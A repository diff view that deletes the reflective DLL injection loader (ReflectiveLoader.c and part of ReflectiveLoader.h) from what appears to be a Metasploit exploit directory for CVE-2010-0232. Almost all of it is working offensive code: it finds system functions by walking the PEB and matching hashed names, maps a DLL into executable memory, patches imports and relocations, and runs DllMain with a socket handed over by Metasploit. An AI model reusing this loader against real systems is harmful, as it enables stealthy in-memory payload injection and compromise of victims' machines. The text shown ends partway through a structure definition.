-			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
107
-			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
108
-			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
109
-			{
110
-				uiHeaderValue += uiLibraryAddress;
111
-				// break if we have found a valid MZ/PE header
112
-				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
113
-					break;
114
-			}
115
-		}
116
-		uiLibraryAddress--;
117
-	}
118
-
119
-	// STEP 1: process the kernels exports for the functions our loader needs...
120
-
121
-	// get the Process Enviroment Block
122
-#ifdef _WIN64
123
-	uiBaseAddress = __readgsqword( 0x60 );
124
-#else
125
-#ifdef WIN_ARM
126
-	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
127
-#else _WIN32
128
-	uiBaseAddress = __readfsdword( 0x30 );
129
-#endif
130
-#endif
131
-
132
-	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
133
-	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
134
-
135
-	// get the first entry of the InMemoryOrder module list
136
-	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
137
-	while( uiValueA )
138
-	{
139
-		// get pointer to current modules name (unicode string)
140
-		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
141
-		// set bCounter to the length for the loop
142
-		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
143
-		// clear uiValueC which will store the hash of the module name
144
-		uiValueC = 0;
145
-
146
-		// compute the hash of the module name...
147
-		do
148
-		{
149
-			uiValueC = ror( (DWORD)uiValueC );
150
-			// normalize to uppercase if the module name is in lowercase
151
-			if( *((BYTE *)uiValueB) >= 'a' )
152
-				uiValueC += *((BYTE *)uiValueB) - 0x20;
153
-			else
154
-				uiValueC += *((BYTE *)uiValueB);
155
-			uiValueB++;
156
-		} while( --usCounter );
157
-
158
-		// compare the hash with that of kernel32.dll
159
-		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
160
-		{
161
-			// get this modules base address
162
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
163
-
164
-			// get the VA of the modules NT Header
165
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
166
-
167
-			// uiNameArray = the address of the modules export directory entry
168
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
169
-
170
-			// get the VA of the export directory
171
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
172
-
173
-			// get the VA for the array of name pointers
174
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
175
-			
176
-			// get the VA for the array of name ordinals
177
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
178
-
179
-			usCounter = 3;
180
-#ifdef ENABLE_STOPPAGING
181
-			usCounter++;
182
-#endif
183
-#ifdef ENABLE_OUTPUTDEBUGSTRING
184
-			usCounter++;
185
-#endif
186
-
187
-			// loop while we still have imports to find
188
-			while( usCounter > 0 )
189
-			{
190
-				// compute the hash values for this function name
191
-				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
192
-				
193
-				// if we have found a function we want we get its virtual address
194
-				if( dwHashValue == LOADLIBRARYA_HASH
195
-					|| dwHashValue == GETPROCADDRESS_HASH
196
-					|| dwHashValue == VIRTUALALLOC_HASH
197
-#ifdef ENABLE_STOPPAGING
198
-					|| dwHashValue == VIRTUALLOCK_HASH
199
-#endif
200
-#ifdef ENABLE_OUTPUTDEBUGSTRING
201
-					|| dwHashValue == OUTPUTDEBUG_HASH
202
-#endif
203
-					)
204
-				{
205
-					// get the VA for the array of addresses
206
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
207
-
208
-					// use this functions name ordinal as an index into the array of name pointers
209
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
210
-
211
-					// store this functions VA
212
-					if( dwHashValue == LOADLIBRARYA_HASH )
213
-						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
214
-					else if( dwHashValue == GETPROCADDRESS_HASH )
215
-						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
216
-					else if( dwHashValue == VIRTUALALLOC_HASH )
217
-						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
218
-#ifdef ENABLE_STOPPAGING
219
-					else if( dwHashValue == VIRTUALLOCK_HASH )
220
-						pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
221
-#endif
222
-#ifdef ENABLE_OUTPUTDEBUGSTRING
223
-					else if( dwHashValue == OUTPUTDEBUG_HASH )
224
-						pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
225
-#endif
226
-			
227
-					// decrement our counter
228
-					usCounter--;
229
-				}
230
-
231
-				// get the next exported function name
232
-				uiNameArray += sizeof(DWORD);
233
-
234
-				// get the next exported function name ordinal
235
-				uiNameOrdinals += sizeof(WORD);
236
-			}
237
-		}
238
-		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
239
-		{
240
-			// get this modules base address
241
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
242
-
243
-			// get the VA of the modules NT Header
244
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
245
-
246
-			// uiNameArray = the address of the modules export directory entry
247
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
248
-
249
-			// get the VA of the export directory
250
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
251
-
252
-			// get the VA for the array of name pointers
253
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
254
-			
255
-			// get the VA for the array of name ordinals
256
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
257
-
258
-			usCounter = 1;
259
-
260
-			// loop while we still have imports to find
261
-			while( usCounter > 0 )
262
-			{
263
-				// compute the hash values for this function name
264
-				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
265
-				
266
-				// if we have found a function we want we get its virtual address
267
-				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
268
-				{
269
-					// get the VA for the array of addresses
270
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
271
-
272
-					// use this functions name ordinal as an index into the array of name pointers
273
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
274
-
275
-					// store this functions VA
276
-					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
277
-						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
278
-
279
-					// decrement our counter
280
-					usCounter--;
281
-				}
282
-
283
-				// get the next exported function name
284
-				uiNameArray += sizeof(DWORD);
285
-
286
-				// get the next exported function name ordinal
287
-				uiNameOrdinals += sizeof(WORD);
288
-			}
289
-		}
290
-
291
-		// we stop searching when we have found everything we need.
292
-		if( pLoadLibraryA
293
-			&& pGetProcAddress
294
-			&& pVirtualAlloc
295
-#ifdef ENABLE_STOPPAGING
296
-			&& pVirtualLock
297
-#endif
298
-			&& pNtFlushInstructionCache
299
-#ifdef ENABLE_OUTPUTDEBUGSTRING
300
-			&& pOutputDebug
301
-#endif
302
-			)
303
-			break;
304
-
305
-		// get the next entry
306
-		uiValueA = DEREF( uiValueA );
307
-	}
308
-
309
-	// STEP 2: load our image into a new permanent location in memory...
310
-
311
-	// get the VA of the NT Header for the PE to be loaded
312
-	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
313
-
314
-	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
315
-	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
316
-	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
317
-
318
-#ifdef ENABLE_STOPPAGING
319
-	// prevent our image from being swapped to the pagefile
320
-	pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
321
-#endif
322
-
323
-	// we must now copy over the headers
324
-	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
325
-	uiValueB = uiLibraryAddress;
326
-	uiValueC = uiBaseAddress;
327
-
328
-	while( uiValueA-- )
329
-		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
330
-
331
-	// STEP 3: load in all of our sections...
332
-
333
-	// uiValueA = the VA of the first section
334
-	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
335
-	
336
-	// itterate through all sections, loading them into memory.
337
-	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
338
-	while( uiValueE-- )
339
-	{
340
-		// uiValueB is the VA for this section
341
-		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
342
-
343
-		// uiValueC if the VA for this sections data
344
-		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
345
-
346
-		// copy the section over
347
-		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
348
-
349
-		while( uiValueD-- )
350
-			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
351
-
352
-		// get the VA of the next section
353
-		uiValueA += sizeof( IMAGE_SECTION_HEADER );
354
-	}
355
-
356
-	// STEP 4: process our images import table...
357
-
358
-	// uiValueB = the address of the import directory
359
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
360
-	
361
-	// we assume there is an import table to process
362
-	// uiValueC is the first entry in the import table
363
-	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
364
-	
365
-	// iterate through all imports until a null RVA is found (Characteristics is mis-named)
366
-	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
367
-	{
368
-		OUTPUTDBG("Loading library: ");
369
-		OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
370
-		OUTPUTDBG("\n");
371
-
372
-		// use LoadLibraryA to load the imported module into memory
373
-		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
374
-
375
-		if ( !uiLibraryAddress )
376
-		{
377
-			OUTPUTDBG("Loading library FAILED\n");
378
-
379
-			uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
380
-			continue;
381
-		}
382
-
383
-		// uiValueD = VA of the OriginalFirstThunk
384
-		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
385
-	
386
-		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
387
-		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
388
-
389
-		// itterate through all imported functions, importing by ordinal if no name present
390
-		while( DEREF(uiValueA) )
391
-		{
392
-			// sanity check uiValueD as some compilers only import by FirstThunk
393
-			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
394
-			{
395
-				// get the VA of the modules NT Header
396
-				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
397
-
398
-				// uiNameArray = the address of the modules export directory entry
399
-				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
400
-
401
-				// get the VA of the export directory
402
-				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
403
-
404
-				// get the VA for the array of addresses
405
-				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
406
-
407
-				// use the import ordinal (- export ordinal base) as an index into the array of addresses
408
-				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
409
-
410
-				// patch in the address for this imported function
411
-				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
412
-			}
413
-			else
414
-			{
415
-				// get the VA of this functions import by name struct
416
-				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
417
-
418
-				OUTPUTDBG("Resolving function: ");
419
-				OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
420
-				OUTPUTDBG("\n");
421
-
422
-				// use GetProcAddress and patch in the address for this imported function
423
-				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
424
-			}
425
-			// get the next imported function
426
-			uiValueA += sizeof( ULONG_PTR );
427
-			if( uiValueD )
428
-				uiValueD += sizeof( ULONG_PTR );
429
-		}
430
-
431
-		// get the next import
432
-		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
433
-	}
434
-
435
-	// STEP 5: process all of our images relocations...
436
-
437
-	// calculate the base address delta and perform relocations (even if we load at desired image base)
438
-	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
439
-
440
-	// uiValueB = the address of the relocation directory
441
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
442
-
443
-	// check if their are any relocations present
444
-	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
445
-	{
446
-		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
447
-		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
448
-
449
-		// and we itterate through all entries...
450
-		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
451
-		{
452
-			// uiValueA = the VA for this relocation block
453
-			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
454
-
455
-			// uiValueB = number of entries in this relocation block
456
-			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
457
-
458
-			// uiValueD is now the first entry in the current relocation block
459
-			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
460
-
461
-			// we itterate through all the entries in the current block...
462
-			while( uiValueB-- )
463
-			{
464
-				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
465
-				// we dont use a switch statement to avoid the compiler building a jump table
466
-				// which would not be very position independent!
467
-				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
468
-					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
469
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
470
-					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
471
-#ifdef WIN_ARM
472
-				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
473
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
474
-				{	
475
-					register DWORD dwInstruction;
476
-					register DWORD dwAddress;
477
-					register WORD wImm;
478
-					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
479
-					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
480
-					// flip the words to get the instruction as expected
481
-					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
482
-					// sanity chack we are processing a MOV instruction...
483
-					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
484
-					{
485
-						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
486
-						wImm  = (WORD)( dwInstruction & 0x000000FF);
487
-						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
488
-						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
489
-						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
490
-						// apply the relocation to the target address
491
-						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
492
-						// now create a new instruction with the same opcode and register param.
493
-						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
494
-						// patch in the relocated address...
495
-						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
496
-						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
497
-						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
498
-						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
499
-						// now flip the instructions words and patch back into the code...
500
-						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
501
-					}
502
-				}
503
-#endif
504
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
505
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
506
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
507
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
508
-
509
-				// get the next entry in the current relocation block
510
-				uiValueD += sizeof( IMAGE_RELOC );
511
-			}
512
-
513
-			// get the next entry in the relocation directory
514
-			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
515
-		}
516
-	}
517
-
518
-	// STEP 6: call our images entry point
519
-
520
-	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
521
-	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
522
-
523
-	OUTPUTDBG("Flushing the instruction cache");
524
-	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
525
-	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
526
-
527
-	// call our respective entry point, fudging our hInstance value
528
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
529
-	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
530
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
531
-#else
532
-	// if we are injecting an DLL via a stub we call DllMain with no parameter
533
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
534
-#endif
535
-
536
-	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
537
-	return uiValueA;
538
-}
539
-//===============================================================================================//
540
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
541
-
542
-// you must implement this function...
543
-extern DWORD DLLEXPORT Init( SOCKET socket );
544
-
545
-BOOL MetasploitDllAttach( SOCKET socket )
546
-{
547
-	Init( socket );
548
-	return TRUE;
549
-}
550
-
551
-BOOL MetasploitDllDetach( DWORD dwExitFunc )
552
-{
553
-	switch( dwExitFunc )
554
-	{
555
-		case EXITFUNC_SEH:
556
-			SetUnhandledExceptionFilter( NULL );
557
-			break;
558
-		case EXITFUNC_THREAD:
559
-			ExitThread( 0 );
560
-			break;
561
-		case EXITFUNC_PROCESS:
562
-			ExitProcess( 0 );
563
-			break;
564
-		default:
565
-			break;
566
-	}
567
-
568
-	return TRUE;
569
-}
570
-
571
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
572
-{
573
-    BOOL bReturnValue = TRUE;
574
-
575
-	switch( dwReason ) 
576
-    { 
577
-		case DLL_METASPLOIT_ATTACH:
578
-			bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
579
-			break;
580
-		case DLL_METASPLOIT_DETACH:
581
-			bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
582
-			break;
583
-		case DLL_QUERY_HMODULE:
584
-			if( lpReserved != NULL )
585
-				*(HMODULE *)lpReserved = hAppInstance;
586
-			break;
587
-		case DLL_PROCESS_ATTACH:
588
-			hAppInstance = hinstDLL;
589
-			break;
590
-		case DLL_PROCESS_DETACH:
591
-		case DLL_THREAD_ATTACH:
592
-		case DLL_THREAD_DETACH:
593
-            break;
594
-    }
595
-	return bReturnValue;
596
-}
597
-
598
-#endif
599
-//===============================================================================================//

+ 0
- 223
external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h View File

@@ -1,223 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
29
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
30
-//===============================================================================================//
31
-#define WIN32_LEAN_AND_MEAN
32
-#include <windows.h>
33
-#include <Winsock2.h>
34
-#include <intrin.h>
35
-
36
-#include "ReflectiveDLLInjection.h"
37
-
38
-// Enable this define to turn on OutputDebugString support
39
-//#define ENABLE_OUTPUTDEBUGSTRING 1
40
-
41
-// Enable this define to turn on locking of memory to prevent paging
42
-#define ENABLE_STOPPAGING 1
43
-
44
-#define EXITFUNC_SEH		0xEA320EFE
45
-#define EXITFUNC_THREAD		0x0A2A1DE0
46
-#define EXITFUNC_PROCESS	0x56A2B5F0
47
-
48
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
49
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
50
-typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
51
-typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
52
-
53
-#define KERNEL32DLL_HASH				0x6A4ABC5B
54
-#define NTDLLDLL_HASH					0x3CFA685D
55
-
56
-#define LOADLIBRARYA_HASH				0xEC0E4E8E
57
-#define GETPROCADDRESS_HASH				0x7C0DFCAA
58
-#define VIRTUALALLOC_HASH				0x91AFCA54
59
-#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
60
-
61
-#ifdef ENABLE_STOPPAGING
62
-typedef LPVOID  (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
63
-#define VIRTUALLOCK_HASH				0x0EF632F2
64
-#endif
65
-
66
-#ifdef ENABLE_OUTPUTDEBUGSTRING
67
-typedef LPVOID  (WINAPI * OUTPUTDEBUG)( LPCSTR );
68
-#define OUTPUTDEBUG_HASH				0x470D22BC
69
-#endif
70
-
71
-#define IMAGE_REL_BASED_ARM_MOV32A		5
72
-#define IMAGE_REL_BASED_ARM_MOV32T		7
73
-
74
-#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
75
-#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
76
-#define ARM_MOVW						0xF2400000
77
-#define ARM_MOVT						0xF2C00000
78
-
79
-#define HASH_KEY						13
80
-//===============================================================================================//
81
-#pragma intrinsic( _rotr )
82
-
83
-__forceinline DWORD ror( DWORD d )
84
-{
85
-	return _rotr( d, HASH_KEY );
86
-}
87
-
88
-__forceinline DWORD _hash( char * c )
89
-{
90
-    register DWORD h = 0;
91
-	do
92
-	{
93
-		h = ror( h );
94
-        h += *c;
95
-	} while( *++c );
96
-
97
-    return h;
98
-}
99
-//===============================================================================================//
100
-typedef struct _UNICODE_STR
101
-{
102
-  USHORT Length;
103
-  USHORT MaximumLength;
104
-  PWSTR pBuffer;
105
-} UNICODE_STR, *PUNICODE_STR;
106
-
107
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
108
-//__declspec( align(8) ) 
109
-typedef struct _LDR_DATA_TABLE_ENTRY
110
-{
111
-	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
112
-	LIST_ENTRY InMemoryOrderModuleList;
113
-	LIST_ENTRY InInitializationOrderModuleList;
114
-	PVOID DllBase;
115
-	PVOID EntryPoint;
116
-	ULONG SizeOfImage;
117
-	UNICODE_STR FullDllName;
118
-	UNICODE_STR BaseDllName;
119
-	ULONG Flags;
120
-	SHORT LoadCount;
121
-	SHORT TlsIndex;
122
-	LIST_ENTRY HashTableEntry;
123
-	ULONG TimeDateStamp;
124
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
125
-
126
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
127
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
128
-{
129
-   DWORD dwLength;
130
-   DWORD dwInitialized;
131
-   LPVOID lpSsHandle;
132
-   LIST_ENTRY InLoadOrderModuleList;
133
-   LIST_ENTRY InMemoryOrderModuleList;
134
-   LIST_ENTRY InInitializationOrderModuleList;
135
-   LPVOID lpEntryInProgress;
136
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
137
-
138
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
139
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
140
-{
141
-   struct _PEB_FREE_BLOCK * pNext;
142
-   DWORD dwSize;
143
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
144
-
145
-// struct _PEB is defined in Winternl.h but it is incomplete
146
-// WinDbg> dt -v ntdll!_PEB
147
-typedef struct __PEB // 65 elements, 0x210 bytes
148
-{
149
-   BYTE bInheritedAddressSpace;
150
-   BYTE bReadImageFileExecOptions;
151
-   BYTE bBeingDebugged;
152
-   BYTE bSpareBool;
153
-   LPVOID lpMutant;
154
-   LPVOID lpImageBaseAddress;
